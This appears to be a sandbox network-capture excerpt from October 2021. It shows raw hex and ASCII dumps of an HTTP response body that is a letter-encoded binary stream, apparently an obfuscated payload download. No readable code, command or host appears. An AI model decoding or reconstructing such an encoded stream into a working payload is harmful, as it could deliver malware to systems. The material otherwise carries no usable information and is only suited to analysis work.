                                                                                                2021-10-26 15:35:12 UTC3951INData Raw: 55 20 4f 50 20 4d 53 70 20 69 20 54 4d 6e 20 54 70 67 20 54 6e 55 20 4d 54 70 20 4d 4d 69 20 4d 53 50 20 4d 69 55 20 4d 53 55 20 54 53 4f 20 69 6e 20 4f 4d 20 54 50 6e 20 4d 67 69 20 4d 4d 55 20 54 67 70 20 54 4d 20 54 6e 6e 20 4d 4d 70 20 4d 50 69 20 4d 53 50 20 4d 54 4d 20 4d 69 4f 20 54 55 6e 20 54 53 67 20 4d 50 54 20 54 4d 54 20 4f 70 20 4f 55 20 4d 4d 53 20 4d 50 53 20 54 53 67 20 54 50 55 20 4f 70 20 67 6e 20 54 55 70 20 54 53 20 50 4d 20 54 67 50 20 67 50 20 54 67 67 20 54 4f 4d 20 54 55 69 20 54 4d 53 20 67 4f 20 54 69 55 20 4d 50 50 20 54 70 6e 20 54 4f 20 4d 53 67 20 54 4d 4d 20 6e 70 20 67 4f 20 4f 54 20 4d 53 50 20 54 50 55 20 54 50 6e 20 54 53 67 20 54 55 50 20 67 6e 20 54 50 4d 20 4d 4d 6e 20 54 53 53 20 54 67 4d 20 4d 55 20 6e 53 20 4d 4d
                                                                                                Data Ascii: U OP MSp i TMn Tpg TnU MTp MMi MSP MiU MSU TSO in OM TPn Mgi MMU Tgp TM Tnn MMp MPi MSP MTM MiO TUn TSg MPT TMT Op OU MMS MPS TSg TPU Op gn TUp TS PM TgP gP Tgg TOM TUi TMS gO TiU MPP Tpn TO MSg TMM np gO OT MSP TPU TPn TSg TUP gn TPM MMn TSS TgM MU nS MM
                                                                                                2021-10-26 15:35:12 UTC3967INData Raw: 6e 20 54 4d 4f 20 4d 4d 6e 20 70 53 20 4d 4d 4d 20 54 4d 53 20 54 70 20 54 70 54 20 4f 4d 20 6e 53 20 4d 67 55 20 54 70 55 20 4d 53 55 20 54 69 67 20 4d 69 6e 20 54 4f 69 20 4d 4d 4d 20 54 54 4f 20 4d 69 67 20 4d 4d 70 20 54 53 53 20 54 20 54 67 55 20 54 55 20 70 4f 20 54 50 70 20 50 53 20 54 55 69 20 4d 67 4d 20 4d 69 6e 20 69 53 20 54 69 50 20 54 6e 6e 20 4d 4d 50 20 70 54 20 4d 67 50 20 69 54 20 4d 69 69 20 55 20 54 67 69 20 4d 70 20 54 55 69 20 54 54 54 20 54 70 69 20 50 4d 20 54 4d 69 20 54 6e 69 20 50 20 54 69 70 20 70 6e 20 4d 55 20 54 53 50 20 4d 67 50 20 54 70 67 20 54 6e 50 20 54 6e 70 20 54 70 4f 20 54 4f 6e 20 54 53 50 20 4d 4d 4f 20 54 55 4f 20 54 69 53 20 54 50 67 20 67 54 20 4d 53 50 20 54 50 70 20 50 70 20 6e 53 20 54 50 67 20 54 67 6e 20
                                                                                                Data Ascii: n TMO MMn pS MMM TMS Tp TpT OM nS MgU TpU MSU Tig Min TOi MMM TTO Mig MMp TSS T TgU TU pO TPp PS TUi MgM Min iS TiP Tnn MMP pT MgP iT Mii U Tgi Mp TUi TTT Tpi PM TMi Tni P Tip pn MU TSP MgP Tpg TnP Tnp TpO TOn TSP MMO TUO TiS TPg gT MSP TPp Pp nS TPg Tgn
                                                                                                2021-10-26 15:35:12 UTC3983INData Raw: 53 70 20 54 70 67 20 4f 70 20 4d 67 4f 20 4d 54 67 20 70 69 20 50 53 20 54 67 55 20 54 70 70 20 4f 4f 20 54 4d 55 20 54 4d 6e 20 4d 67 70 20 4d 67 4f 20 4d 53 70 20 4d 53 69 20 54 6e 70 20 55 54 20 6e 69 20 54 6e 6e 20 69 20 54 53 4f 20 4d 67 6e 20 54 54 54 20 4d 54 70 20 4d 54 70 20 54 69 67 20 54 4f 67 20 4d 53 20 54 67 6e 20 70 20 4d 4d 20 4d 69 55 20 54 50 6e 20 4d 50 20 54 70 69 20 54 70 4d 20 54 6e 50 20 4d 53 50 20 70 67 20 4f 67 20 6e 55 20 69 4f 20 4f 69 20 54 70 54 20 4d 54 4d 20 4d 67 4d 20 54 70 69 20 4d 67 20 6e 55 20 4d 54 55 20 70 4f 20 54 50 67 20 54 53 67 20 4d 54 50 20 54 69 4d 20 4d 53 50 20 55 54 20 54 67 20 54 54 53 20 54 4f 54 20 54 54 50 20 6e 20 4d 54 54 20 70 54 20 54 69 69 20 4f 55 20 54 50 20 54 6e 55 20 69 4d 20 67 4d 20 4d 67
                                                                                                Data Ascii: Sp Tpg Op MgO MTg pi PS TgU Tpp OO TMU TMn Mgp MgO MSp MSi Tnp UT ni Tnn i TSO Mgn TTT MTp MTp Tig TOg MS Tgn p MM MiU TPn MP Tpi TpM TnP MSP pg Og nU iO Oi TpT MTM MgM Tpi Mg nU MTU pO TPg TSg MTP TiM MSP UT Tg TTS TOT TTP n MTT pT Tii OU TP TnU iM gM Mg
                                                                                                2021-10-26 15:35:12 UTC3999INData Raw: 54 55 20 6e 55 20 54 67 55 20 4d 69 55 20 54 55 69 20 4d 50 50 20 69 50 20 4d 4d 53 20 55 67 20 4d 69 53 20 54 69 55 20 54 67 6e 20 54 69 54 20 4f 70 20 6e 4f 20 6e 54 20 4d 4d 67 20 6e 70 20 4d 69 4d 20 54 4f 50 20 54 54 54 20 50 69 20 54 70 4f 20 50 55 20 54 6e 6e 20 54 69 55 20 54 69 70 20 54 53 69 20 55 50 20 55 54 20 4d 69 70 20 6e 4f 20 50 67 20 4d 53 67 20 55 4f 20 4d 54 4f 20 4d 67 67 20 54 54 70 20 54 55 50 20 4d 4d 4f 20 54 53 67 20 54 69 20 6e 55 20 54 67 54 20 4d 4d 53 20 54 69 69 20 69 67 20 54 67 70 20 4d 4d 54 20 54 6e 53 20 67 70 20 50 50 20 54 6e 20 54 50 20 54 53 20 54 69 54 20 54 6e 6e 20 4d 67 4f 20 4d 69 55 20 54 4f 4d 20 54 50 55 20 54 4d 50 20 54 6e 69 20 54 50 54 20 54 4f 4f 20 4d 54 6e 20 54 6e 67 20 54 4f 69 20 70 55 20 54 69 20
                                                                                                Data Ascii: TU nU TgU MiU TUi MPP iP MMS Ug MiS TiU Tgn TiT Op nO nT MMg np MiM TOP TTT Pi TpO PU Tnn TiU Tip TSi UP UT Mip nO Pg MSg UO MTO Mgg TTp TUP MMO TSg Ti nU TgT MMS Tii ig Tgp MMT TnS gp PP Tn TP TS TiT Tnn MgO MiU TOM TPU TMP Tni TPT TOO MTn Tng TOi pU Ti
                                                                                                2021-10-26 15:35:12 UTC4015INData Raw: 4d 67 4d 20 54 6e 4f 20 54 70 55 20 4d 54 53 20 54 55 4f 20 67 54 20 50 4d 20 54 4d 67 20 54 67 20 4d 54 4d 20 54 4f 4d 20 69 20 70 69 20 54 70 67 20 4d 54 69 20 54 69 6e 20 54 4d 53 20 54 54 55 20 54 54 70 20 6e 55 20 6e 54 20 54 67 67 20 54 55 20 67 53 20 50 69 20 70 69 20 54 55 55 20 54 67 4d 20 54 54 4f 20 54 70 6e 20 54 50 54 20 54 53 67 20 4d 67 53 20 4d 50 53 20 4d 53 67 20 54 69 69 20 67 69 20 6e 6e 20 69 4d 20 4d 54 53 20 6e 70 20 4d 69 4d 20 54 69 4d 20 4d 69 4f 20 4f 54 20 4d 50 53 20 4d 54 67 20 4d 67 54 20 6e 50 20 6e 67 20 54 50 69 20 54 6e 55 20 54 67 55 20 54 70 20 69 50 20 69 50 20 4d 4d 20 54 55 70 20 54 70 50 20 54 53 69 20 4d 4d 4d 20 50 53 20 54 69 67 20 54 67 54 20 4d 69 50 20 54 69 54 20 54 53 6e 20 67 50 20 4d 53 54 20 54 55 54 20
                                                                                                Data Ascii: MgM TnO TpU MTS TUO gT PM TMg Tg MTM TOM i pi Tpg MTi Tin TMS TTU TTp nU nT Tgg TU gS Pi pi TUU TgM TTO Tpn TPT TSg MgS MPS MSg Tii gi nn iM MTS np MiM TiM MiO OT MPS MTg MgT nP ng TPi TnU TgU Tp iP iP MM TUp TpP TSi MMM PS Tig TgT MiP TiT TSn gP MST TUT
                                                                                                2021-10-26 15:35:12 UTC4031INData Raw: 20 54 55 20 54 67 69 20 55 6e 20 4d 67 69 20 50 4f 20 54 4d 67 20 54 4d 70 20 54 55 20 4d 69 53 20 50 54 20 55 67 20 54 4f 69 20 54 4f 70 20 54 53 55 20 6e 69 20 4d 54 55 20 54 4f 4d 20 4d 53 6e 20 50 53 20 54 4f 20 4d 69 70 20 4d 20 54 4f 53 20 4d 4d 69 20 54 50 4f 20 6e 4f 20 4d 4d 55 20 54 53 20 55 4d 20 6e 55 20 6e 50 20 54 67 70 20 54 70 50 20 6e 20 6e 70 20 54 53 53 20 50 50 20 55 4f 20 67 6e 20 4d 67 4f 20 54 4f 67 20 4f 70 20 67 53 20 54 67 54 20 54 4d 4d 20 54 4d 55 20 4d 67 69 20 6e 55 20 54 50 54 20 70 20 54 6e 69 20 55 54 20 4f 20 55 20 69 20 6e 54 20 70 55 20 69 6e 20 4d 4d 6e 20 54 69 50 20 50 4d 20 54 50 67 20 69 70 20 54 50 20 4d 69 6e 20 54 70 67 20 67 20 54 55 67 20 54 69 50 20 54 69 67 20 4d 53 53 20 54 54 54 20 54 4f 4f 20 69 20 4d 67
                                                                                                Data Ascii: TU Tgi Un Mgi PO TMg TMp TU MiS PT Ug TOi TOp TSU ni MTU TOM MSn PS TO Mip M TOS MMi TPO nO MMU TS UM nU nP Tgp TpP n np TSS PP UO gn MgO TOg Op gS TgT TMM TMU Mgi nU TPT p Tni UT O U i nT pU in MMn TiP PM TPg ip TP Min Tpg g TUg TiP Tig MSS TTT TOO i Mg
                                                                                                2021-10-26 15:35:12 UTC4047INData Raw: 20 4d 4d 50 20 54 70 54 20 54 50 54 20 4d 53 54 20 54 4d 20 54 69 4f 20 4f 20 69 53 20 67 67 20 70 70 20 67 70 20 54 69 4d 20 6e 55 20 4f 70 20 4f 55 20 55 54 20 4d 69 20 4d 54 4d 20 4d 53 53 20 54 67 4f 20 54 50 6e 20 4f 20 6e 20 69 67 20 55 67 20 4d 54 53 20 6e 6e 20 67 4d 20 54 20 54 69 55 20 54 50 69 20 54 4d 4d 20 54 55 55 20 55 70 20 54 67 4d 20 54 55 4f 20 50 70 20 67 55 20 54 69 20 55 69 20 54 54 53 20 4d 4d 53 20 54 54 53 20 54 67 4f 20 54 4f 67 20 54 50 4f 20 4d 69 4d 20 54 70 67 20 54 4d 55 20 4d 53 4f 20 4d 53 20 54 70 69 20 54 53 54 20 54 67 4d 20 4d 53 6e 20 54 69 6e 20 4d 53 20 54 4d 53 20 4d 69 70 20 54 70 54 20 4d 67 4f 20 50 4d 20 4d 67 67 20 4d 53 67 20 6e 20 4d 69 53 20 54 70 54 20 54 4d 67 20 4f 6e 20 4d 54 69 20 4d 4d 67 20 54 4f 50
                                                                                                Data Ascii: MMP TpT TPT MST TM TiO O iS gg pp gp TiM nU Op OU UT Mi MTM MSS TgO TPn O n ig Ug MTS nn gM T TiU TPi TMM TUU Up TgM TUO Pp gU Ti Ui TTS MMS TTS TgO TOg TPO MiM Tpg TMU MSO MS Tpi TST TgM MSn Tin MS TMS Mip TpT MgO PM Mgg MSg n MiS TpT TMg On MTi MMg TOP
                                                                                                2021-10-26 15:35:12 UTC4063INData Raw: 20 4d 50 67 20 4d 69 4f 20 67 20 54 54 4d 20 67 4d 20 53 20 53 20 53 20 53 20 54 69 53 20 69 55 20 53 20 53 20 54 20 67 4d 20 69 20 53 20 53 20 53 20 69 53 20 69 6e 20 53 20 53 20 54 53 20 53 20 4d 4d 54 20 54 70 6e 20 53 20 53 20 53 20 69 67 20 70 20 4d 50 69 20 4d 4d 20 70 67 20 53 20 53 20 54 20 4d 50 69 20 54 4d 20 54 20 53 20 67 4d 20 54 20 53 20 53 20 53 20 55 55 20 67 4d 20 53 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 54 20 53 20 70 4f 20 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 54 69 55 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 54 70 67 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 4d 53 67 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 4d 4d 54 20 54 53 67 20 53 20 53 20 53 20 4d 50 69 20 54 4d 20 4d 20 53 20 4d 50 69 20 54 69 20 54 20 53 20 4d 50 69 20 54
                                                                                                Data Ascii: MPg MiO g TTM gM S S S S TiS iU S S T gM i S S S iS in S S TS S MMT Tpn S S S ig p MPi MM pg S S T MPi TM T S gM T S S S UU gM S S S S MPi Ti T S pO i S S S S S S S TiU MPP MPP MPP Tpg MPP MPP MPP MSg MPP MPP MPP MMT TSg S S S MPi TM M S MPi Ti T S MPi T
                                                                                                2021-10-26 15:35:12 UTC4079INData Raw: 54 20 53 20 53 20 54 53 20 50 55 20 70 54 20 53 20 53 20 53 20 4d 50 69 20 4f 20 53 20 53 20 54 54 69 20 54 4d 20 4d 20 69 20 54 54 4d 20 67 4d 20 53 20 53 20 53 20 53 20 69 53 20 6e 53 20 53 20 53 20 54 53 20 50 6e 20 67 6e 20 53 20 53 20 53 20 54 54 69 20 67 69 20 4d 20 69 20 54 54 4d 20 67 4d 20 53 20 53 20 53 20 53 20 69 53 20 6e 4f 20 53 20 53 20 54 53 20 69 53 20 4d 53 20 53 20 53 20 70 20 69 53 20 6e 70 20 53 20 53 20 54 53 20 67 4d 20 53 20 53 20 53 20 53 20 4d 50 69 20 67 20 50 70 20 50 20 53 20 53 20 53 20 67 4d 20 54 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 53 20 53 20 50 70 20 53 20 53 20 53 20 53 20 4d 4d 54 20 54 70 67 20 53 20 53 20 53 20 4d 50 69 20 54 4d 20 4d 20 53 20 67 4d 20 54 20 53 20 53 20 53 20 55 55 20 67 4d 20 53 20 53 20 53 20
                                                                                                Data Ascii: T S S TS PU pT S S S MPi O S S TTi TM M i TTM gM S S S S iS nS S S TS Pn gn S S S TTi gi M i TTM gM S S S S iS nO S S TS iS MS S S p iS np S S TS gM S S S S MPi g Pp P S S S gM T S S S MPi Ti S S Pp S S S S MMT Tpg S S S MPi TM M S gM T S S S UU gM S S S
                                                                                                2021-10-26 15:35:12 UTC4095INData Raw: 54 53 20 4d 50 69 20 54 69 20 69 20 53 20 67 4d 20 67 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 69 67 20 70 20 4d 50 69 20 4d 4d 20 54 53 69 20 53 20 53 20 54 20 4d 50 69 20 54 4d 20 69 20 53 20 54 69 4d 20 54 53 50 20 67 4d 20 53 20 53 20 53 20 53 20 4d 50 69 20 54 20 4d 50 69 20 54 69 20 50 20 53 20 67 4d 20 69 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 4d 50 69 20 54 4d 20 50 20 53 20 4d 50 69 20 54 69 20 6e 20 53 20 4d 50 69 20 54 4d 20 6e 20 53 20 50 6e 20 4d 69 20 53 20 53 20 53 20 67 4d 20 50 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 54 4d 70 20 54 54 50 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 70 20 53 20 53 20 50 70 20 4d 54 6e 20 53 20 53 20 53 20 53 20 67 4d 20 6e 20 53 20 53 20 53 20 4d 50 69 20 54 69 20
                                                                                                Data Ascii: TS MPi Ti i S gM g S S S MPi Ti g S ig p MPi MM TSi S S T MPi TM i S TiM TSP gM S S S S MPi T MPi Ti P S gM i S S S MPi Ti g S MPi TM P S MPi Ti n S MPi TM n S Pn Mi S S S gM P S S S MPi Ti g S TMp TTP S S TS MPi Ti p S S Pp MTn S S S S gM n S S S MPi Ti
                                                                                                2021-10-26 15:35:12 UTC4111INData Raw: 53 20 53 20 67 54 20 50 54 20 54 50 6e 20 67 6e 20 67 54 20 4d 53 20 67 54 20 54 54 70 20 54 50 6e 20 67 6e 20 67 4d 20 54 4f 20 53 20 53 20 53 20 67 54 20 50 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 4f 20 53 20 53 20 53 20 67 54 20 54 53 4d 20 54 50 6e 20 67 6e 20 67 4d 20 54 4f 20 53 20 53 20 53 20 67 54 20 54 53 4d 20 54 50 6e 20 67 6e 20 67 4d 20 54 4f 20 53 20 53 20 53 20 67 54 20 4f 55 20 54 50 6e 20 67 6e 20 67 54 20 54 4f 20 67 54 20 54 4d 53 20 54 50 6e 20 67 6e 20 67 4d 20 54 55 20 53 20 53 20 53 20 67 54 20 54 53 4d 20 54 50 6e 20 67 6e 20 67 4d 20 54 55 20 53 20 53 20 53 20 67 54 20 4f 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 55 20 53 20 53 20 53 20 67 54 20 54 53 4d 20 54 50 6e 20 67 6e 20 67 4d 20 54 55 20 53 20 53 20 53 20 67 54 20 50 69 20 54
                                                                                                Data Ascii: S S gT PT TPn gn gT MS gT TTp TPn gn gM TO S S S gT Pn TPn gn gM TO S S S gT TSM TPn gn gM TO S S S gT TSM TPn gn gM TO S S S gT OU TPn gn gT TO gT TMS TPn gn gM TU S S S gT TSM TPn gn gM TU S S S gT On TPn gn gM TU S S S gT TSM TPn gn gM TU S S S gT Pi T
                                                                                                2021-10-26 15:35:12 UTC4127INData Raw: 20 69 4d 20 4d 50 69 20 4f 20 4d 20 53 20 4d 53 20 55 54 20 67 4d 20 53 20 53 20 53 20 53 20 69 4d 20 53 20 53 20 54 4f 20 69 55 20 50 20 53 20 70 54 20 53 20 53 20 53 20 69 4d 20 53 20 53 20 54 6e 20 4d 50 69 20 4f 20 53 20 53 20 54 54 54 20 54 55 6e 20 53 20 53 20 54 53 20 67 4d 20 54 20 53 20 53 20 53 20 55 55 20 54 69 54 20 4f 6e 20 53 20 53 20 54 20 4d 50 69 20 54 69 20 53 20 53 20 4d 50 69 20 4f 20 53 20 53 20 67 4d 20 53 20 53 20 53 20 53 20 4d 50 69 20 54 4d 20 53 20 53 20 67 4d 20 53 20 53 20 53 20 53 20 4d 50 69 20 4f 20 53 20 53 20 54 54 54 20 54 55 6e 20 53 20 53 20 54 53 20 54 54 54 20 54 55 55 20 53 20 53 20 54 53 20 4d 50 69 20 54 4d 20 53 20 53 20 69 4d 20 53 20 53 20 53 20 54 4f 20 69 55 20 69 20 53 20 54 69 20 54 20 53 20 53 20 53 20 53
                                                                                                Data Ascii: iM MPi O M S MS UT gM S S S S iM S S TO iU P S pT S S S iM S S Tn MPi O S S TTT TUn S S TS gM T S S S UU TiT On S S T MPi Ti S S MPi O S S gM S S S S MPi TM S S gM S S S S MPi O S S TTT TUn S S TS TTT TUU S S TS MPi TM S S iM S S S TO iU i S Ti T S S S S
                                                                                                2021-10-26 15:35:12 UTC4143INData Raw: 20 4f 20 55 70 20 54 4d 55 20 54 67 50 20 54 67 69 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 50 4f 20 54 50 6e 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 4f 69 20 54 4d 4d 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 54 67 69 20 55 55 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 54 4f 67 20 54 70 69 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 4d 67 70 20 69 4d 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 54 53 4f 20 54 67 50 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 54 54 54 20 69 55 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 55 53 20 54 50 50 20 4d 4d 54 20 4f 20 55 70 20 54 4d 55 20 4d 67 4d 20 4f 4f 20 4d 4d 54 20 4f 20 70 20 70 20 54 69 54 20 70 69 20 54 53 70 20 53 20 55 70 20 54 4d 55 20 54 69 50 20 50 4d 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 50 6e 20
                                                                                                Data Ascii: O Up TMU TgP Tgi MMT O Up TMU PO TPn MMT O Up TMU Oi TMM MMT O Up TMU Tgi UU MMT O Up TMU TOg Tpi MMT O Up TMU Mgp iM MMT O Up TMU TSO TgP MMT O Up TMU TTT iU MMT O Up TMU US TPP MMT O Up TMU MgM OO MMT O p p TiT pi TSp S Up TMU TiP PM MPS TS Up TMU TPn
                                                                                                2021-10-26 15:35:12 UTC4159INData Raw: 4d 20 4f 20 53 20 54 70 69 20 53 20 54 54 69 20 4d 20 4f 20 53 20 54 70 55 20 53 20 54 54 4f 20 4d 20 4f 20 53 20 54 6e 4d 20 53 20 67 4d 20 4d 20 4f 20 53 20 54 6e 70 20 53 20 54 4d 69 20 4d 20 4f 20 53 20 54 55 53 20 53 20 54 4d 4f 20 4d 20 4f 20 53 20 54 55 69 20 53 20 54 67 69 20 4d 20 4f 20 53 20 54 55 55 20 53 20 54 67 4f 20 4d 20 4f 20 53 20 54 4f 4d 20 53 20 54 69 69 20 4d 20 4f 20 53 20 54 4f 70 20 53 20 54 69 4f 20 4d 20 4f 20 53 20 4d 53 53 20 53 20 54 50 69 20 4d 20 4f 20 53 20 4d 53 69 20 53 20 54 50 4f 20 4d 20 4f 20 53 20 4d 53 55 20 53 20 54 70 69 20 4d 20 4f 20 53 20 4d 54 4d 20 53 20 54 70 4f 20 4d 20 4f 20 53 20 4d 54 70 20 53 20 54 6e 69 20 4d 20 4f 20 53 20 4d 4d 53 20 53 20 54 6e 4f 20 4d 20 4f 20 53 20 4d 4d 69 20 53 20 54 55 69 20
                                                                                                Data Ascii: M O S Tpi S TTi M O S TpU S TTO M O S TnM S gM M O S Tnp S TMi M O S TUS S TMO M O S TUi S Tgi M O S TUU S TgO M O S TOM S Tii M O S TOp S TiO M O S MSS S TPi M O S MSi S TPO M O S MSU S Tpi M O S MTM S TpO M O S MTp S Tni M O S MMS S TnO M O S MMi S TUi
                                                                                                2021-10-26 15:35:12 UTC4175INData Raw: 67 20 54 54 53 20 54 54 50 20 54 53 54 20 54 54 69 20 54 54 70 20 70 50 20 4f 4f 20 54 53 54 20 53 20 55 4d 20 54 53 54 20 54 54 4d 20 54 53 55 20 4f 6e 20 4f 4f 20 54 53 54 20 53 20 70 6e 20 54 54 69 20 54 53 54 20 4f 6e 20 54 54 70 20 54 53 54 20 6e 67 20 54 54 53 20 54 54 50 20 54 54 70 20 4f 6e 20 54 54 53 20 4f 4f 20 54 53 54 20 53 20 54 53 67 20 54 53 54 20 54 54 70 20 4f 50 20 6e 54 20 54 53 54 20 54 54 70 20 6e 67 20 54 54 53 20 54 54 50 20 54 54 70 20 4f 6e 20 54 54 53 20 4f 4f 20 54 53 54 20 53 20 55 67 20 54 53 50 20 54 4d 4d 20 54 53 54 20 54 53 53 20 55 4d 20 54 53 54 20 54 53 4d 20 54 53 54 20 54 54 69 20 54 53 54 20 54 54 53 20 4f 4f 20 54 53 54 20 53 20 6e 54 20 54 53 54 20 54 54 70 20 6e 4d 20 4f 6e 20 54 54 50 20 54 53 69 20 70 6e 20 54
                                                                                                Data Ascii: g TTS TTP TST TTi TTp pP OO TST S UM TST TTM TSU On OO TST S pn TTi TST On TTp TST ng TTS TTP TTp On TTS OO TST S TSg TST TTp OP nT TST TTp ng TTS TTP TTp On TTS OO TST S Ug TSP TMM TST TSS UM TST TSM TST TTi TST TTS OO TST S nT TST TTp nM On TTP TSi pn T
                                                                                                2021-10-26 15:35:12 UTC4191INData Raw: 54 20 54 54 53 20 54 54 70 20 70 55 20 54 53 50 20 54 54 69 20 54 53 54 20 4f 4f 20 54 54 70 20 54 54 54 20 54 54 69 20 54 4d 54 20 53 20 55 4d 20 54 53 54 20 54 53 67 20 54 53 50 20 54 54 50 20 54 54 70 20 54 54 69 20 54 4d 54 20 53 20 54 54 54 20 54 54 4d 20 4f 50 20 70 4f 20 54 54 67 20 54 54 6e 20 4f 6e 20 54 53 55 20 54 53 50 20 54 54 70 20 54 4d 54 20 53 20 54 54 54 20 54 54 4d 20 4f 50 20 6e 67 20 54 54 53 20 54 53 54 20 54 54 67 20 54 54 6e 20 4f 6e 20 54 53 55 20 54 53 50 20 54 54 70 20 54 4d 54 20 53 20 6e 54 20 54 53 54 20 54 54 70 20 6e 50 20 54 53 54 20 54 54 69 20 54 54 53 20 54 53 54 20 54 53 55 20 6e 4f 20 4f 55 20 54 53 70 20 54 53 54 20 4f 4f 20 54 54 70 20 55 67 20 54 53 54 20 4f 4f 20 54 54 6e 20 54 54 69 20 54 53 50 20 54 54 70 20 54
                                                                                                Data Ascii: T TTS TTp pU TSP TTi TST OO TTp TTT TTi TMT S UM TST TSg TSP TTP TTp TTi TMT S TTT TTM OP pO TTg TTn On TSU TSP TTp TMT S TTT TTM OP ng TTS TST TTg TTn On TSU TSP TTp TMT S nT TST TTp nP TST TTi TTS TST TSU nO OU TSp TST OO TTp Ug TST OO TTn TTi TSP TTp T
                                                                                                2021-10-26 15:35:12 UTC4207INData Raw: 4d 67 55 20 54 50 69 20 54 67 70 20 4d 67 55 20 54 50 69 20 54 67 69 20 4d 67 55 20 54 50 50 20 54 67 70 20 4d 67 55 20 54 50 69 20 54 69 54 20 4d 67 55 20 54 50 50 20 54 69 54 20 4d 67 55 20 54 50 69 20 54 67 70 20 4d 67 55 20 54 50 69 20 54 6e 4d 20 4d 67 55 20 54 50 69 20 54 55 55 20 4d 67 55 20 54 50 69 20 54 70 70 20 4d 67 55 20 54 50 69 20 54 67 69 20 4d 67 55 20 54 50 69 20 54 69 54 20 4d 67 55 20 54 50 69 20 54 50 54 20 4d 67 55 20 54 50 69 20 54 67 50 20 4d 67 55 20 54 50 69 20 54 69 53 20 4d 67 55 20 54 50 69 20 54 67 69 20 53 20 4d 4d 70 20 54 50 55 20 54 67 6e 20 4d 4d 70 20 54 50 55 20 54 55 54 20 4d 4d 70 20 54 50 55 20 54 67 70 20 4d 4d 70 20 54 50 55 20 54 55 67 20 4d 4d 70 20 54 50 55 20 54 67 4d 20 4d 4d 70 20 54 50 55 20 54 6e 55 20 4d
                                                                                                Data Ascii: MgU TPi Tgp MgU TPi Tgi MgU TPP Tgp MgU TPi TiT MgU TPP TiT MgU TPi Tgp MgU TPi TnM MgU TPi TUU MgU TPi Tpp MgU TPi Tgi MgU TPi TiT MgU TPi TPT MgU TPi TgP MgU TPi TiS MgU TPi Tgi S MMp TPU Tgn MMp TPU TUT MMp TPU Tgp MMp TPU TUg MMp TPU TgM MMp TPU TnU M
                                                                                                2021-10-26 15:35:12 UTC4223INData Raw: 54 69 53 20 54 50 6e 20 4d 4d 4f 20 54 69 54 20 54 70 53 20 4d 4d 4f 20 54 69 54 20 54 69 54 20 4d 4d 4f 20 54 69 53 20 54 70 53 20 4d 4d 4f 20 54 69 54 20 54 69 4d 20 53 20 4d 67 69 20 54 69 69 20 54 4d 55 20 4d 67 69 20 54 69 69 20 54 69 53 20 4d 67 69 20 54 69 69 20 54 69 67 20 4d 67 69 20 54 69 69 20 54 50 69 20 4d 67 69 20 54 69 67 20 54 70 54 20 4d 67 69 20 54 69 67 20 54 50 50 20 4d 67 69 20 54 69 67 20 54 50 70 20 4d 67 69 20 54 69 67 20 54 50 6e 20 4d 67 69 20 54 69 67 20 54 50 55 20 4d 67 69 20 54 69 69 20 54 69 69 20 4d 67 69 20 54 69 67 20 54 70 4d 20 4d 67 69 20 54 69 67 20 54 50 69 20 4d 67 69 20 54 69 69 20 54 69 69 20 4d 67 69 20 54 69 67 20 54 6e 54 20 4d 67 69 20 54 69 69 20 54 69 4d 20 53 20 4d 4d 50 20 54 69 55 20 54 55 55 20 4d 4d 50
                                                                                                Data Ascii: TiS TPn MMO TiT TpS MMO TiT TiT MMO TiS TpS MMO TiT TiM S Mgi Tii TMU Mgi Tii TiS Mgi Tii Tig Mgi Tii TPi Mgi Tig TpT Mgi Tig TPP Mgi Tig TPp Mgi Tig TPn Mgi Tig TPU Mgi Tii Tii Mgi Tig TpM Mgi Tig TPi Mgi Tii Tii Mgi Tig TnT Mgi Tii TiM S MMP TiU TUU MMP
                                                                                                2021-10-26 15:35:12 UTC4239INData Raw: 4d 20 54 69 6e 20 4d 4d 6e 20 54 50 54 20 54 69 50 20 4d 4d 6e 20 54 50 54 20 54 69 55 20 4d 4d 6e 20 54 50 4d 20 54 67 67 20 4d 4d 6e 20 54 50 54 20 54 50 53 20 53 20 4d 67 55 20 54 50 54 20 54 4d 55 20 4d 67 55 20 54 50 54 20 54 4d 4f 20 4d 67 55 20 54 50 53 20 54 55 50 20 4d 67 55 20 54 50 54 20 54 70 4f 20 4d 67 55 20 54 50 54 20 54 50 70 20 4d 67 55 20 54 50 53 20 54 55 6e 20 4d 67 55 20 54 50 54 20 54 4d 4f 20 4d 67 55 20 54 50 54 20 54 70 4f 20 4d 67 55 20 54 50 53 20 54 55 4f 20 4d 67 55 20 54 50 4d 20 54 4d 4f 20 4d 67 55 20 54 50 53 20 54 55 69 20 4d 67 55 20 54 50 54 20 54 69 69 20 4d 67 55 20 54 50 54 20 54 6e 69 20 4d 67 55 20 54 50 53 20 54 55 69 20 4d 67 55 20 54 50 54 20 54 50 53 20 53 20 4d 67 54 20 54 50 55 20 54 50 6e 20 4d 67 54 20 54
                                                                                                Data Ascii: M Tin MMn TPT TiP MMn TPT TiU MMn TPM Tgg MMn TPT TPS S MgU TPT TMU MgU TPT TMO MgU TPS TUP MgU TPT TpO MgU TPT TPp MgU TPS TUn MgU TPT TMO MgU TPT TpO MgU TPS TUO MgU TPM TMO MgU TPS TUi MgU TPT Tii MgU TPT Tni MgU TPS TUi MgU TPT TPS S MgT TPU TPn MgT T
